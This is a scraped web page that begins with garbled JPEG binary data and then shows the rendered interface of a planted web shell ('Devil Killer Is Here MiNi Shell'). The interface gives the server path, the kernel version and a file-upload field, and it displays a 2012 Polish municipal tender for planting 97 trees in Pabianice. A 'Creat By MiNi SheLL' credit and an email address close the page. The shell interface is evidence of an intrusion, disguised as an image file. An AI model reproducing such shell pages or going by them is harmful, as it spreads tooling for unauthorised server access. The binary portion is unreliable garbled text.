JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120903/188809-N-2012.html

<p class="kh_header"><b>Pabianice: Dostawę sadzonek drzew,  przygotowanie terenu pod nasadzenia, nasadzenie
 oraz pielęgnację nasadzonych drzew
 przez okres 3 lat od dnia odbioru wykonanych nasadzeń</b><br>
<b>Numer ogłoszenia: 188809 - 2012; data zamieszczenia: 03.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Pabianice reprezentowana przez Prezydenta Miasta Pabianic Zbigniewa Dychto , ul. Zamkowa 16, 95-200 Pabianice, woj. łódzkie, tel. 042 2254600, faks 042 2254669.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pabianice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę sadzonek drzew,  przygotowanie terenu pod nasadzenia, nasadzenie
 oraz pielęgnację nasadzonych drzew
 przez okres 3 lat od dnia odbioru wykonanych nasadzeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Zamówienie obejmuje:
Dostawę sadzonek drzew, przygotowanie terenu pod nasadzenia, nasadzenie (łącznie 97 drzew) oraz pielęgnację nasadzonych drzew przez okres 3 lat od dnia odbioru wykonanych nasadzeń:           
1). Zgodnie z tabelą nr 1:
Tabela nr 1
L.p.
Gatunek
Ilość
Obwód pnia drzewka na wysokości 
100 cm.
Wysokość drzewek
Miejsce nasadzenia dostarczonych sadzonek
1
Acer campestre (Acer campesrte Elsrijk)
9 szt.
12-14 cm.
300-350 cm.
Teren Miejskiego Ośrodka Sportu
 i Rekreacji, 
ul. Grota Roweckiego 3, Pabianice 
 zgodnie 
z projektem obsadzeń stanowiącym załącznik
nr 6 do niniejszej SIWZ oraz decyzją znak: ZDiZM 1885 41 07 z dnia 09.07.2010r. (zmienioną decyzją znak ZDiZM (3871)10A
2
Acer platanoides Crimson King
4 szt
12-14 cm.
300-350 cm.

3
Acer platanoides Drummondii
(Acer negundo Odessanum)
2 szt.
12-14 cm.
300-350 cm.

4
Carpinus betulus
6 szt.
12-14 cm.
300-350 cm.

5
Crataegusum laevigata Pauls Scarlet 
16 szt.
8-10 cm.
250-300 cm.

6
Malus purpurea Eleyi
6 szt.
8-10 cm.
250-300 cm.

7
Quercus palustris (Quercus robur)
15 szt.
12-14 cm.
300-350 cm.

8
Salix alba (Fraxinus excelsior)
6 szt.
12-14 cm.
300-350 cm.

9
Sorbus intermedia (Sorbus aucuparia)
5 szt.
8-10 cm.
250-300 cm.

10
Sorbus torminalis (Sorbus aria)
6 szt.
8-10 cm.
250-300 cm.

11
Tilia cordata Greenspire
(Tilia platyphyllos)
3 szt.
12-14 cm.
300-350 cm.

Łącznie 78 szt.
2). Zgodnie z tabelą nr 2:
Tabela nr 2
L.p.
Gatunek
Ilość
Obwód pnia drzewka na wysokości 
100 cm.
Wysokość drzewek
Miejsce nasadzenia dostarczonych sadzonek
1
Acer platanoides
7 szt.
12-14 cm.
300-350 cm.
 pas drogowy ulicy Grota Roweckiego 
 dz. nr 267 6 
Pabianice - zgodnie
 z decyzją znak: ZDiZM 3387 93 10 D 
z dnia 22.10.2010 r. 
zmienioną decyzją znak: ZDiZM(2412)11 A 
z dnia 13.09.2011 r.
Łącznie 7 szt.

3). Zgodnie z tabelą nr 3:
Tabela nr 3
L.p.
Gatunek
Ilość
Obwód pnia drzewka na wysokości 
100 cm.
Wysokość drzewek
Miejsce nasadzenia dostarczonych sadzonek
1
Tilia cordata
5 szt.
12-14 cm.
300-350 cm.
pas drogowy ulicy Piłsudskiego dz. nr 106
Pabianice - zgodnie
  z decyzją znak: ZDiZM 3386 92 10 D 
z dnia 22.10.2010 r. 
zmienioną decyzją znak: ZDiZM(2412)11 A 
z dnia 13.09.2011 r.
 Łącznie 5 szt.

4). Zgodnie z tabelą nr 4:
Tabela nr 4
L.p.
Gatunek
Ilość
Obwód pnia drzewka na wysokości 
100 cm.
Wysokość drzewek
Miejsce nasadzenia dostarczonych sadzonek
1
Aesculus hippocastanum
7 szt.
12-14 cm.
300-350 cm.
pas drogowy ulicy Grota Roweckiego dz. nr 267 5 oraz 267 6 
Pabianice - zgodnie
 z decyzją znak: ZDiZM 3191 91 10 D 
z dnia 22.10.2010 r. 
zmienioną decyzją znak: ZDiZM(2412)11 A 
z dnia 13.09.2011 r.
 Łącznie 7 szt.

II. Warunki szczegółowe:
1. W zakresie dostawy sadzonek:
1).Rośliny muszą być zdrowe, zdrewniałe, prawidłowo uformowane z zachowaniem pokroju charakterystycznego dla gatunku i odmiany oraz posiadać następujące cechy: pąk szczytowy przewodnika powinien być wyraźnie uformowany, przyrost ostatniego roku powinien wyraźnie i prosto przedłużać przewodnik, pędy korony drzew powinny być przycięte, przewodnik wyraźnie prosty, równomiernie rozmieszczone pędy boczne korony drzewa,
2).System korzeniowy musi być dobrze wykształcony, zwarty, prawidłowo rozwinięty, odpowiedni do wieku rośliny, na korzeniach szkieletowych powinny występować liczne korzenie drobne; bryła korzeniowa sadzonych drzew powinna być prawidłowo uformowana i nieuszkodzona,
3).Wady niedopuszczalne: silne uszkodzenia mechaniczne roślin, ślady żerowania szkodników, oznaki chorobowe, martwice i pęknięcia kory, uszkodzenia pąka szczytowego przewodnika, uszkodzenia lub przesuszenia bryły korzeniowej, goły korzeń.
2. W zakresie przygotowania terenu oraz wykonania nasadzeń drzew:
1). Przygotowanie terenu pod wykonanie nasadzeń:
a).koszenie z wygrabieniem i wywozem w miejsce wskazane przez Zamawiającego,
b).uprawa gleby glebogryzarką z ręcznym, dokładnym wygrabieniem darni i jej korzeni(w przypadku nasadzeń na terenie Miejskiego Ośrodka Sportu  i Rekreacji). 
2).Wykopanie dołów do nasadzeń  średnicy minimum 0,5 m i głębokości 1,5 m,
3). Zaprawa dołów ziemią kompostową (ogrodniczą) do połowy głębokości,
4). Założenie drenu do podlewania,
5).Nasadzenie drzew zgodnie ze sztuką ogrodniczą oraz wydanymi decyzjami w miejscach wskazanych przez Zamawiającego,
6).Podlanie, wykonanie talerza z gruntu rodzimego, nałożenie 15 cm. warstwy kory w promieniu 0,75 cm.
7).Usztywnienie każdego drzewa palikiem toczonym średnicy 60-80 mm zaimpregnowanym ciśnieniowo z przymocowaniem taśmą. Wysokość palików musi być dostosowana do wysokości drzewa, taśmy mocujące muszą mieć odpowiednią szerokość.
8).Wykonanie trawnika - zastąpienie usuniętego trawnika trawnikiem z niskich gatunków traw, nie ekspansywnych, umożliwiających wegetację świeżo posadzonym drzewkom.
3. W zakresie pielęgnacji nasadzonych drzew:
1) Prowadzenie prac pielęgnacyjnych nasadzonych drzew przez okres 3 lat od dnia odbioru wykonanych nasadzeń w sposób zapewniający prawidłowy rozwój roślin zgodnie z zasadami sztuki ogrodniczej,
2) Podlewanie - ośmiokrotne w sezonie, w ilości 0,24 m 3szt. rocznie,
3) Pielenie - czterokrotne
4) Nawożenie - jednokrotne - nawozem wieloskładnikowym w ilości 6 dkg szt. rocznie
5) Zabezpieczenie na okres zimowy - kopczykowanie z kory - jednokrotne, 
6) Wiosenne rozgarnięcie kopczyków,
7) Kształtowanie korony drzew poprzez cięcia pielęgnacyjne,
8) Wymiana drzew na nowe - ubytki normatywne 6 %,
9) Wymiana palików i taśm ochraniających drzewa w przypadku ich zniszczenia - ubytki normatywne 6%,
10) Uczestniczenie 2 razy w roku w przeglądach wykonanych nasadzeń na wezwanie Zamawiającego,
11) Koszenie trawnika 3-krotnie w ciągu sezonu.

Decyzje organów administracyjnych określających wykonanie nasadzeń zastępczych oraz szczegółowe lokalizacje nasadzeń zostaną wskazane Wykonawcy po podpisaniu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.21.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeżeli wykonawca w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (jeżeli okres prowadzenia działalności przez oferenta jest krótszy - to w tym okresie) wykonał minimum 2 usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia tj. nasadzenia drzew liściastych o obwodzie pni minimum 12-14 cm w ilości powyżej 40 sztuk wraz z załączeniem dokumentów potwierdzających należyte wykonanie usług.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty- załącznik nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień ust. 2. 
 2. Zmiana postanowień zawartej umowy może nastąpić tylko i wyłącznie w zakresie zmiany terminu realizacji zamówienia w przypadku zaistnienia następujących okoliczności:
1) działania siły wyższej;
2) wstrzymania prac lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego.
 3. Warunkiem wprowadzenia zmian zawartej umowy jest sporządzenie podpisanego przez Strony Protokołu Konieczności, określającego przyczyny zmiany oraz potwierdzającego wystąpienie okoliczności wymienionych w ust. 2. Protokół konieczności będzie załącznikiem do aneksu zmieniającego niniejszą umowę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.pabianice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wydziale Infrastruktury Miejskiej i Ochrony Środowiska Urzędu Miejskiego w Pabianicach, z siedzibą przy ul. Św.Jana 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2012 godzina 09:00, miejsce: Oferty należy złożyć u Zamawiającego: w Biurze Obsługi Interesantów, ul. Zamkowa 16..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com